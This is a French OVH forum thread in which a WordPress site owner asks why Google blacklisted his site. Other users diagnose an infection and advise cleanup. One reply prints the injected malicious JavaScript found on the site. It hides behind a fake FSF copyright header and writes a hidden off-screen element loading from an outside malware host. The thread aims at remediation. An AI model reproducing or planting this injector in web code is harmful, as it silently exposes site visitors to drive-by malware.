OVH Community, votre nouvel espace communautaire.

Blacklisté par google car réseau AS16276 (OVH)

Nowwhat

24/09/2014, 10h37

Surtout: il faut trouver la raison pourquoi le site est infecté .

Un script (PHP, autre) que t'as installé contient probablement une faille.

Partons de ce principe: Vide totalement ton répertoire /www/ (autrement dit: DocumentRoot).
A partir de cet instant, tout fichier que tu remets en place doit venir d'une source digne de confiance. En cas de doute: ne le fait pas.
Evite stp les plugins écrits par mon fils, son copain et toute la clique. Ils ont l'air utile, beau, etc, mais pas fiable du tout

magicvince

24/09/2014, 10h23

Envoyé par ddpak

J'ai déjà eu ce problème pour un client, ton site est bien infecté !
Je viens d'aller faire un tour malgré ce beau message...

Ce sont tes fichiers javascript qui sont infecté
Désactive tout tes plugins ! et fais du ménage dans tes fichiers.

Voila un exemple de code qui pourrit ton site...
...

Oui bien vu, on est sur la piste de ce bout de code
(hier lorsque j'ai lancé mon message, il n'y avait pas encore de page identifiée comme diffusant un malware)
Je lance les opérations de nettoyages

ddpak

24/09/2014, 10h05

J'ai déjà eu ce problème pour un client, ton site est bien infecté !
Je viens d'aller faire un tour malgré ce beau message...

Ce sont tes fichiers javascript qui sont infecté
Désactive tout tes plugins ! et fais du ménage dans tes fichiers.

Voila un exemple de code qui pourrit ton site...

Code:

/*
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
function Depositormengarslife() {
    function Expocarus(name, value, expires) {
        var date = new Date( new Date().getTime() + expires * 1000 );
        document.cookie = name + '=' + value + '; path=/; expires=' + date.toUTCString();
    }
    function Afillatepost(name) {
        var afrodita = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^]) / g, '\$1') + "=([^;]*)" ));
        return afrodita ? decodeURIComponent(afrodita[1]) : undefined;
    }
    var cookie = Afillatepost('salurdonersite');
    if (cookie == undefined) {
        Expocarus('salurdonersite', true, 259201);
        document.write('http://poplluris.aliencybercafe.ro/iflasoris16.khml</a></b>" style="position:absolute;top:-999px;left:-999px;" height="131" width="131">');
    }
}
Depositormengarslife();

Je peux te le faire si jamais tu es perdu...

fritz2cat

24/09/2014, 08h55

Vois http://www.google.com/safebrowsing/d...bre.org/&hl=fr :

Page de diagnostic pour colibre.org
Quel est l'état actuel du site colibre.org ?

Ce site est répertorié comme suspect. Une visite sur celui-ci peut endommager votre ordinateur.

Une activité suspecte sur une partie de ce site a été détectée 2 fois au cours des 90 derniers jours.

Que s'est-il passé lors de la visite de ce site par le robot Google ?

Sur les 12 pages du site que nous avons testées au cours des 90 derniers jours, un certain nombre (4) entraînait le téléchargement et l'installation de logiciels malveillants sans l'autorisation de l'utilisateur. La dernière visite effectuée par le robot Google sur ce site a eu lieu le 2014-09-23, et le dernier contenu suspect sur celui-ci a été détecté le 2014-09-23.
Des logiciels malveillants sont hébergés sur 2 domaine(s), y compris anaguri.com.ar/, mysmsapi.info/.

Ce site était hébergé sur 1 réseau(x), y compris AS16276 (OVH).

Ce site a-t-il servi d'intermédiaire pour favoriser la propagation de logiciels malveillants ?

Au cours des 90 derniers jours, colibre.org ne semble pas avoir servi d'intermédiaire pour l'infection de sites.

Ce site a-t-il hébergé des logiciels malveillants ?

Non, ce site n'a hébergé aucun logiciel malveillant au cours des 90 derniers jours.

Que s'est-il passé ?

Dans certains cas, des tiers peuvent ajouter du code malveillant sur des sites légitimes, ce qui déclenche l'affichage du message d'avertissement.

Jejeleponey-

24/09/2014, 06h31

Salut,

Le fait que tu sois sur le réseau OVH n'y est pour rien, chaque message d'avertissement indique le réseau. Tu peux d'ailleurs en cliquant dessus te rendre compte qu'il y a des centaines de sites qui sont dans ton cas (sur des centaines de milliers qu'héberge OVH).

Le message est assez clair, 2 de tes pages ont été modifié et ils envoient maintenant un malware sans demande de l'utilisateur lorsque ceux ci naviguent sur ton site.
Regarde au niveau des deux domaines indiqué par google et fait une recherche de cette chaine sur tes pages, avec de la chance tu pourrais trouver facilement. Si tu ne trouve pas, c'est que le contenu est encodé et va falloir chercher un peu plus. Commence déjà par regarder les dates de modification de tes pages qui ne colleraient pas ou qui sont récentes.
Une fois le problème résolu, pense aussi à mettre à jour ton wordpress et/ou désactiver les plugins incriminé.

magicvince

23/09/2014, 19h06

Bonjour,

mon serveur est blacklisté par google et affiche un vilain message comme suspect alors que la page de safebrowsing indique que "0" pages entraînent le téléghargement d'un malware et au cours des 90 jours le site n'a rien hébergé de suspect (toujours d'après la page de diagnostic de google).

le site : http://colibre.org

Quand je passe par l'outil webmaster de google, il m'indique deux pages qui pourraient contenir du code malicieux mais je ne repère rien.

http://colibre.org/colibre/debouches/
http://colibre.org/agenda/deux-sur-la-balancoire/

sinon le seul trucs suspect c'est que je suis sur le réseau AS16276 (OVH) qui contiendrait plusieurs sites verolés et pourrisseurs.

Est-ce que quelqu'un parmi vous y verrait mieux que moi? (j'ai juste depuis désactivé un plugin wordpress qui affiche dez twitts).

Merci de vos retours